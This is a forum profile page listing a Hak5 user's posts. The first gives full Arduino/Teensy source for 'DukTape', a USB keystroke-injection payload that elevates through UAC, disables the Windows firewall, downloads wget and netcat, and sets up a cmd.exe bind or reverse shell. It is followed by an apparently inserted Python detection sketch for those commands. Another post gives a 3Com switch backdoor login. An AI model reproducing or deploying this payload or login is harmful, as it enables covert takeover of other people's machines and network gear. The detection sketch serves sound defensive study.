str33ts0ld13r

Posts posted by str33ts0ld13r

  1. Greetings ducky lovers! I'm very excited to finally be making a contribution to the rubber ducky project.

    To get started you will need arduino and the phukdlib.

    DukTape is nothing fancy (pun intended :lol: ). It will get you wget and a few other toys like nc, then it opens a back door for you to get in. When complete it blinks (big surprise, right!! haha). There is MUCH room for improvement on this, but I sadly haven't had time to work on it as much as I would like.. Anyway, I wanted to share what I have put together so far. Please feel free to modify, add, change whatever you like in this code. All that I ask is that you post your changes for the rest of the ducky community. As always, constructive criticism is welcome and appreciated.

    Warning: I have NOT had a chance to test this code with my teensy yet (had some hardware failure on my test boxes :( ). But it compiles fine for me.

    Warning 2: I haven't set up a kill switch feature yet to keep it from running on systems you don't want it to (ie your own system). So you have been warned, it runs every time you plug it in!

    UPDATE: I just added a UAC handler and changed the way the cmd is launched to go through the start menu using the ctrl and esc keys. (Thanks H@L0_F00 for the ctrl esc combo you posted) and (thanks Jonny_Walked, I used some of the code you posted, the UAC handler, and used your cmd launcher) (if this code was Benownzu93's, I thank you). Also the phukdlib is no longer needed with the updated cmd launcher.

    /*
    ################################
    ###########DukTape##############
    ################################
    
    Readme:
    To use DukTape make sure you have
    the phukdlib installed in arduino.
    
    I would like to thank everyone on
    the Rubber Ducky forums http://www.hak5.org/forums/index.php?showforum=56
    who I borrowed ideas and code from.
    
    Debug is done through the serial monitor.
    To disable it comment out/remove the code
    marked as debug (ie.. //debug).
    
    Delays may need to be adjusted...
    */
    
    int ledPin = 11;
    
    void setup()
    {
      delay(5000); //initial delay
      pinMode(ledPin, OUTPUT); 
    
        Serial.begin(9600); //debug
        delay(200);           //debug
        Serial.println("START");//debug
    
      //start cmd hidden
      CMD();
      delay(1000);
      MoveWin();
    
      //prepare work area
      TypeCmd("mkdir %systemroot%\\winduk");
      TypeCmd("cd %systemroot%\\winduk");
      TypeCmd("netsh firewall set opmode disable");//kill firewall
    
      //ftp download wget
      TypeCmd("echo bin >>ftpcmd.txt");
      TypeCmd("echo cd /tex-archive/systems/texlive/tlnet/tlpkg/installer/wget/ >>ftpcmd.txt");
      TypeCmd("echo get wget.exe >>ftpcmd.txt");
      TypeCmd("echo quit >>ftpcmd.txt");
      TypeCmd("ftp -A -v -s:ftpcmd.txt cam.ctan.org"); //run ftp download
      delay(6000);
      TypeCmd("if NOT exist wget.exe ftp -A -v -s:ftpcmd.txt cam.ctan.org");//error recovery in case of wget download fail
    
        Serial.println("Ftp completed");//debug
    
      //Get more tools
      TypeCmd("if NOT exist unzip.exe wget -q http://stahlworks.com/dev/unzip.exe"); //get unzip
      TypeCmd("if NOT exist nircmd.zip wget -q http://www.nirsoft.net/utils/nircmd.zip");//get nircmd
      TypeCmd("if NOT exist nircmdc.exe unzip.exe -qq nircmd.zip"); //unzip nircmd
      TypeCmd("if NOT exist nc111nt.zip wget -q http://joncraton.org/media/files/nc111nt.zip"); //get netcat
      TypeCmd("if NOT exist nc.exe unzip.exe -qq nc111nt.zip nc.exe");//unzip netcat
    
      //Payload
      //TypeCmd("nc -l -p 1337 -d -e cmd.exe");//netcat listens on port leet and launches cmd when a connection is established
      /*TypeCmd("nc -d IP PORT -e cmd.exe");/*reverse netcat replace IP with your ipaddress and replace PORT with the port you use
      on the system you want to connect back to, run "nc -l -p PORT" without the quotes on your system to accept the reverse connection*/
    
      //clean up
      TypeCmd("if Exist nircmdc.exe del /Q nircmd.zip");
      TypeCmd("if EXIST ftpcmd.txt del /Q ftpcmd.txt");
      TypeCmd("if EXIST nc111nt.zip del /Q nc111nt.zip");
      TypeCmd("exit");//close cmd.
        Serial.println("ALL DONE!");//debug
    }
    
    void loop()                     
    {
      digitalWrite(ledPin, HIGH);// LED on
      delay(500);
      digitalWrite(ledPin, LOW);// LED off
      delay(500);
    }
    
    void Enter()
    {
      Keyboard.set_key1(KEY_ENTER);
      Keyboard.send_now();
      Keyboard.set_key1(0);
      Keyboard.send_now();
      delay(100);
    }
    
    void TypeCmd(char *commandtotype)
    {
      //must have cmd prompt open to work
      Keyboard.println("*commandtotype");
      delay(200);
      Enter();
      delay(2000);//Execution delay
        Serial.println("*commandtotype");//debug
    }
    
    void MoveWin()
    {
      Keyboard.set_modifier(MODIFIERKEY_ALT);
      Keyboard.set_key1(KEY_SPACE);
      Keyboard.set_key2(KEY_M);
      Keyboard.send_now();
      delay(50);
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.set_key2(0);
      Keyboard.send_now();
      delay(50);
      for(int x=0; x<200; ++x){
        Keyboard.set_key1(KEY_UP);
        Keyboard.send_now();
        Keyboard.set_key1(0);
        Keyboard.send_now();
        delay(100);
       }
       Enter();
    }
    
    void UAC()
    {
      Keyboard.set_modifier(MODIFIERKEY_ALT);
      Keyboard.set_key1(KEY_Y);
      Keyboard.send_now();
      delay(100);
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
    }
    
    void CMD()
    {
      Keyboard.set_modifier(MODIFIERKEY_CTRL);
      Keyboard.set_key1(KEY_ESC);
      Keyboard.send_now();
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
      Keyboard.print("cmd");
      delay(1000);
      Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
      Keyboard.set_key1(KEY_ENTER);
      Keyboard.send_now();
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
      delay(2000);
      UAC();
    }
    
    
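Flipping this around to the defender's side: the payload above leaves a very recognisable trail in process-creation telemetry (firewall switched off with netsh, wget pulled down through a scripted ftp session, a netcat listener or reverse shell bound to cmd.exe, everything staged under a "winduk" directory). The following is an added detection sketch, not code from the post or from the DukTape project. It assumes Sysmon-style log records with a "CommandLine=" field (an assumed format) and scans constructed sample lines for those indicators, then correlates them so that the firewall being disabled shortly before a scripted download or a cmd.exe-bound netcat is flagged as one sequence rather than isolated hits.

```python
"""Detection sketch for the command sequence a DukTape-style HID payload types.

Added example, not code from the forum post. Record format ("CommandLine=..."
at the end of a process-creation record) and the sample lines are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Rule table: (name, pattern over the command line, severity).
# Patterns are deliberately loose (case-insensitive, optional .exe) because the
# payload types these by hand-style keystrokes with no fixed casing or path.
RULES = [
    ("firewall_disabled",  re.compile(r"netsh\s+firewall\s+set\s+opmode\s+disable", re.I), "high"),
    ("scripted_ftp",       re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I), "medium"),
    ("netcat_cmd_shell",   re.compile(r"\bnc(\.exe)?\b.*\s-e\s+cmd(\.exe)?", re.I), "high"),
    ("staging_dir_winduk", re.compile(r"\\winduk\b", re.I), "low"),
]

LOG_FIELD = re.compile(r"CommandLine=(.*)$")


@dataclass
class Finding:
    line_no: int
    rule: str
    severity: str
    command: str


def extract_command(record: str) -> Optional[str]:
    """Pull the CommandLine value out of one log record, or None if absent."""
    m = LOG_FIELD.search(record)
    return m.group(1).strip() if m else None


def scan(records: List[str]) -> List[Finding]:
    """Run every rule over every record; one Finding per (record, rule) hit."""
    findings = []
    for n, rec in enumerate(records, 1):
        cmd = extract_command(rec)
        if cmd is None:
            continue
        for name, pat, sev in RULES:
            if pat.search(cmd):
                findings.append(Finding(n, name, sev, cmd))
    return findings


def is_duktape_like(findings: List[Finding], window: int = 10) -> bool:
    """True when the firewall is disabled within `window` records of a scripted
    ftp download or a cmd.exe-bound netcat: the sequence, not a lone event."""
    by_rule = {}
    for f in findings:
        by_rule.setdefault(f.rule, []).append(f.line_no)
    fw = by_rule.get("firewall_disabled", [])
    followers = by_rule.get("scripted_ftp", []) + by_rule.get("netcat_cmd_shell", [])
    return any(abs(a - b) <= window for a in fw for b in followers)


# Constructed sample records mirroring the commands the payload above types.
SAMPLE_LOG = [
    "EventID=1 Image=C:\\Windows\\System32\\cmd.exe CommandLine=mkdir %systemroot%\\winduk",
    "EventID=1 Image=C:\\Windows\\System32\\netsh.exe CommandLine=netsh firewall set opmode disable",
    "EventID=1 Image=C:\\Windows\\System32\\ftp.exe CommandLine=ftp -A -v -s:ftpcmd.txt cam.ctan.org",
    "EventID=1 Image=C:\\Windows\\winduk\\nc.exe CommandLine=nc -l -p 1337 -d -e cmd.exe",
    "EventID=1 Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe report.txt",
]

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f"line {h.line_no}: [{h.severity}] {h.rule}: {h.command}")
    print("DukTape-like sequence:", is_duktape_like(hits))
```

The per-command rules are cheap but individually noisy (an admin might legitimately run a scripted ftp session); the correlation step is what turns them into a worthwhile alert. Since the payload only works because the plugged-in device is trusted as a keyboard and the session is unlocked, the matching mitigations are HID device allow-listing and screen-lock policy, with this kind of telemetry rule as the backstop.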

  2. That's sweet man. I've been playing with it in a VM for a few hours. I haven't had any problems with it. A few suggestions I could make would be to add Cain & Abel (I know it's a tool that is looked down upon, but there is no denying that it does have a lot of useful features), maybe Wireshark. I like how the UI is real simple and not cluttered with things that you don't need. I'm really looking forward to the future releases! If I can help with anything, pm me.

  3. You can just get a free shell account from somewhere that allows ssh (most do) and tunnel through that. What I use for my tunnels is my HP server LC2000 (I know it's ancient but it works for me, plus it was free). You always do have the option of just taking one of the junk computers you probably have laying around and putting Linux on it. Ubuntu is really really easy to set up, then just connect it to your network and run it headless. That's usually a cheap way. If you don't have a crapo machine laying around, garage sales are usually a good place to find one.

  4. starchfish: for the 3com firmware 7.0.1 and 8.1.1 (you should be able to get the firmware here if you don't have it: infodeli.3com.com) there is a back door login of debug with the password synnet, just telnet in. It's a major security flaw that they put in that you should probably fix once you get your switches back up..

  5. Exactly the way I feel is, if they are willing to learn I don't mind helping them. But ya, we all have those people that we can't stand.. yours is Steve Jobs, mine is pretty much all sys-admin/IT departments.

    But the one that we can all agree on are those little internet punks.. (I'm sure I'm gonna get flamed for that IT comment (for all you flamers, the key words in that sentence were "pretty much")).

  6. Yeah trusting strangers is hard. Perhaps make it invite only with invitees to supply verifiable data (address, phone number, license number or something) but even then I don't know. I totally love the concept, but will the wannabe Zero Cool losers be able to control themselves?

    Ya, skiddies are a pain in the ass (I mean I'll defend noobs because they haven't had the chance to learn yet, but skiddies don't want to learn.). I like the invite only thing; a registration would be one of the best security measures we could take. (Note: everyone who helps contribute to this project will have access to the hak5 vpn before anyone else is invited.) Registrations will be included in this, thank you for that input Swathe.

    I was thinking of adding a wrapper around the original OpenVPN...

    That would be sweet. Encryption is always good..

    Sorry to everyone, I haven't been able to do as much with this project as I would like. I have a few other projects that have been taking up a considerable amount of my time, but not to worry, those projects are just about wrapped up and I will be able to focus more of my time on this. I hope to really get things moving on this in the next week or so. Now, just to make sure everyone is in agreement, we are going with openvpn....?..

  7. Ok, first off you don't have to port forward your router unless you are connecting to your LAN from the outside internet (ie.. coffee shop wifi connection back through your router to your ssh server). What client are you using? Are you trying to run your sshd on your laptop and connect to it through the loopback adapter (ie.. 127.0.0.1), or are you running your sshd on a separate machine?

  8. A while ago i was thinking of creating a Hamachi clone based on OpenVPN, but never had time to get it started.

    That would be pretty sweet, to add any features that Hamachi has that OpenVPN is missing. If you can code that would be great, I'm not much good when it comes to coding. What were you thinking of adding??

    This has come up quite a bit through the past years. It all comes down to "would you really be willing to join a vpn with a bunch of "hackers". A vpn with complete strangers.

    That's why we have to find a way to make it as secure as possible; your only line of defense shouldn't be your router firewall. I agree that there are a lot of security risks involved and that is one of my main concerns.. seeing as how it has come up before, there is an interest in it, and I think that there is a way to make it work securely.

  9. Yea I heard that in the show too, looks interesting.. I think you're right... leaf is too zero conf (not enough features)

    OpenVPN looks good but I'm concerned it may be a little feature packed and complicated to set up for people with less knowledge of this kind of thing??

    To be perfectly honest I have never done anything with a VPN before this. But the way I feel is that people need to learn things and shouldn't use a weaker product because it's easier. Plus this will be a community project, so there will be plenty of help for people that have questions.

    I have tried Hamachi and OpenVPN, and I prefer OpenVPN, cause I have more control over my connections. In some environments I need to set up a VPN connection behind a firewall, but with Hamachi you have to pay to get a decent speed, while with OpenVPN I noticed only a 20% speed drop.

    Well, speed is key, especially with gaming. Thank you bit hunter for that information. Control over your connections is important when it comes to security.

    I think that with everything that we know now we should go with OpenVPN. Plus there is the fact that the hak5 crew are supposed to feature some things on it in a future ep. Since this is a community project I created a new thread in projects>community projects labeled Hak5 vpn (link to it http://hak5.org/forums/index.php?showtopic=11914)

    So let's move all discussion over there.

  10. I started this thread to move discussion of the hak5 vpn out of the questions section where it started. I will update this first post with all the information that is needed for this project. Please make your comments in this thread instead of the thread in questions.

  11. Obviously you want to use multiple layers of cryptography and hidden volumes for your data, but there needs to be a legit reason for your data being there and consuming that much space. As SomethingToChatWith said, by renaming it a doc file it won't open in simple editors, but if you're going through this much work already your opponent won't be using WordPad. The answer to this is rare formats that consume lots and lots of space. And you can always hide it in a .rar file, then tuck it in an iso or something.. encryption is just a game of hide and seek.

  12. Great episode guys, the pfSense part was great, really would like to see some more on that and security/networking in general. It definitely looks like the hacksaw crew has their work cut out for them after the USB device tracking segment. This was truly a great episode. By the way Darren and Matt, where can I get what you guys were smoking before the show?? That ending segment with you guys had me rolling on the floor, it was great!!! :lol:
